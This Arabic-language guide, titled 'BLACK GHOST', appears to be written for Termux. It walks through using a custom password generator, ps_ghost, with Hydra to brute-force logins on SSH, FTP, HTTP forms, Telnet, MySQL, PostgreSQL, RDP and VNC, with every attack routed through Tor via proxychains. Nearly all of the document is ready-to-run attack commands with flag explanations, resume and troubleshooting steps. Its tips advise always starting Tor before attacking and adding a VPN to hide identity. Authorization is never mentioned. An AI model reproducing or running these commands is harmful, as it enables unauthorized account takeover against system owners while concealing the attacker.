═══════════════════════════════════════════════════════
        BLACK GHOST - دليل الأوامر الكامل
═══════════════════════════════════════════════════════

▼▼▼ 1. تشغيل Tor ▼▼▼
------------------------------------------------------
# في Session جديدة (اسحب من اليسار → New Session)
tor

# انتظر حتى تشوف:
Bootstrapped 100%: Done

# خلي هذي الجلسة مفتوحة!
------------------------------------------------------


▼▼▼ 2. اختبار Tor ▼▼▼
------------------------------------------------------
# في Session الأولى
proxychains4 curl https://check.torproject.org/api/ip

# المفروض تطلع:
{"IsTor":true,"IP":"xxx.xxx.xxx.xxx"}
------------------------------------------------------


▼▼▼ 3. اختبار المولد ▼▼▼
------------------------------------------------------
# عرض أول 10 كلمات
ps_ghost | head -10

# مسح checkpoint والبدء من جديد
ps_ghost --clear
------------------------------------------------------


▼▼▼ 4. تعديل إعدادات المولد ▼▼▼
------------------------------------------------------
nano $PREFIX/bin/ps_ghost

# غيّر هذي الأسطر:
MIN_LENGTH = 7              # طول البداية
MAX_LENGTH = 10             # طول النهاية (0 = لا نهاية)
CHARSET_MODE = 'alphanum'   # numeric|lowercase|alphanum|full
NOTIFY_EVERY = 100000       # إشعار كل كم محاولة

# احفظ: Ctrl+X → Y → Enter
------------------------------------------------------


▼▼▼ 5. هجوم SSH (بدون Tor) ▼▼▼
------------------------------------------------------
ps_ghost | hydra -l admin -P /dev/stdin 192.168.1.1 ssh -t 4 -V -f -o success.txt
------------------------------------------------------


▼▼▼ 6. هجوم SSH (مع Tor) - الأمر الكامل ▼▼▼
------------------------------------------------------
proxychains4 ps_ghost | proxychains4 hydra -l admin -P /dev/stdin 192.168.1.1 ssh -t 4 -V -f -o success.txt

# الشرح:
# proxychains4 ps_ghost          = المولد يشتغل عبر Tor
# proxychains4 hydra             = Hydra يشتغل عبر Tor
# -l admin                       = اسم المستخدم
# -P /dev/stdin                  = يقرأ كلمات المرور من المولد
# 192.168.1.1                    = IP الهدف
# ssh                            = الخدمة المستهدفة
# -t 4                           = 4 اتصالات متوازية
# -V                             = عرض كل محاولة
# -f                             = توقف عند إيجاد كلمة صحيحة
# -o success.txt                 = حفظ النتائج
------------------------------------------------------


▼▼▼ 7. هجوم FTP (مع Tor) ▼▼▼
------------------------------------------------------
proxychains4 ps_ghost | proxychains4 hydra -l admin -P /dev/stdin 192.168.1.1 ftp -t 4 -V -f -o success.txt
------------------------------------------------------


▼▼▼ 8. هجوم HTTP Form (مع Tor) ▼▼▼
------------------------------------------------------
proxychains4 ps_ghost | proxychains4 hydra -l admin -P /dev/stdin example.com http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect" -t 4 -V -f -o success.txt

# ملاحظة: غيّر:
# /login.php               = مسار صفحة تسجيل الدخول
# username=^USER^          = اسم حقل اليوزر في النموذج
# password=^PASS^          = اسم حقل كلمة المرور
# F=incorrect              = الرسالة اللي تطلع عند فشل الدخول
------------------------------------------------------


▼▼▼ 9. مراقبة التقدم ▼▼▼
------------------------------------------------------
# في Session جديدة:

# شوف آخر كلمة وصل لها المولد
cat ghost_checkpoint.txt

# راقب الملف بشكل مباشر
watch -n 2 cat ghost_checkpoint.txt

# شوف النتائج
cat success.txt
------------------------------------------------------


▼▼▼ 10. إيقاف وإعادة تشغيل ▼▼▼
------------------------------------------------------
# للإيقاف:
Ctrl + C

# للإكمال من نفس المكان (التقدم محفوظ تلقائياً):
proxychains4 ps_ghost | proxychains4 hydra -l admin -P /dev/stdin 192.168.1.1 ssh -t 4 -V -f

# للبدء من الصفر:
ps_ghost --clear
------------------------------------------------------


▼▼▼ 11. أمثلة على أهداف مختلفة ▼▼▼
------------------------------------------------------
# SSH
proxychains4 ps_ghost | proxychains4 hydra -l root -P /dev/stdin 192.168.1.1 ssh -t 4 -V -f

# FTP
proxychains4 ps_ghost | proxychains4 hydra -l ftp -P /dev/stdin 192.168.1.1 ftp -t 4 -V -f

# Telnet
proxychains4 ps_ghost | proxychains4 hydra -l admin -P /dev/stdin 192.168.1.1 telnet -t 4 -V -f

# MySQL
proxychains4 ps_ghost | proxychains4 hydra -l root -P /dev/stdin 192.168.1.1 mysql -t 4 -V -f

# PostgreSQL
proxychains4 ps_ghost | proxychains4 hydra -l postgres -P /dev/stdin 192.168.1.1 postgres -t 4 -V -f

# RDP (Windows)
proxychains4 ps_ghost | proxychains4 hydra -l administrator -P /dev/stdin 192.168.1.1 rdp -t 4 -V -f

# VNC
proxychains4 ps_ghost | proxychains4 hydra -P /dev/stdin 192.168.1.1 vnc -t 4 -V -f
------------------------------------------------------


▼▼▼ 12. استكشاف الأخطاء ▼▼▼
------------------------------------------------------
# Tor لا يعمل:
# تأكد إنه شغال في Session 2
# شوف: Bootstrapped 100%: Done

# Hydra يقول "File empty":
# تأكد إن ps_ghost يشتغل:
ps_ghost | head -5

# بطء شديد:
# قلل عدد الاتصالات:
-t 2    # بدلاً من -t 4

# خطأ في proxychains:
# تحقق من الإعدادات:
nano $PREFIX/etc/proxychains.conf
# تأكد من: socks5 127.0.0.1 9050
------------------------------------------------------


▼▼▼ 13. نصائح مهمة ▼▼▼
------------------------------------------------------
✅ دائماً شغل Tor قبل الهجوم
✅ استخدم VPN كطبقة إضافية
✅ ابدأ بـ MIN_LENGTH صغير للاختبار
✅ احفظ التقدم بشكل دوري
✅ راقب استهلاك البطارية في Termux
✅ استخدم -t 4 للتوازن بين السرعة والاستقرار
------------------------------------------------------


▼▼▼ 14. رابط المشروع على GitHub ▼▼▼
------------------------------------------------------
https://github.com/Black-ghost7/ps-ghost
------------------------------------------------------

═══════════════════════════════════════════════════════
        انتهى - حفظ الله وقتك وجهدك
═══════════════════════════════════════════════════════
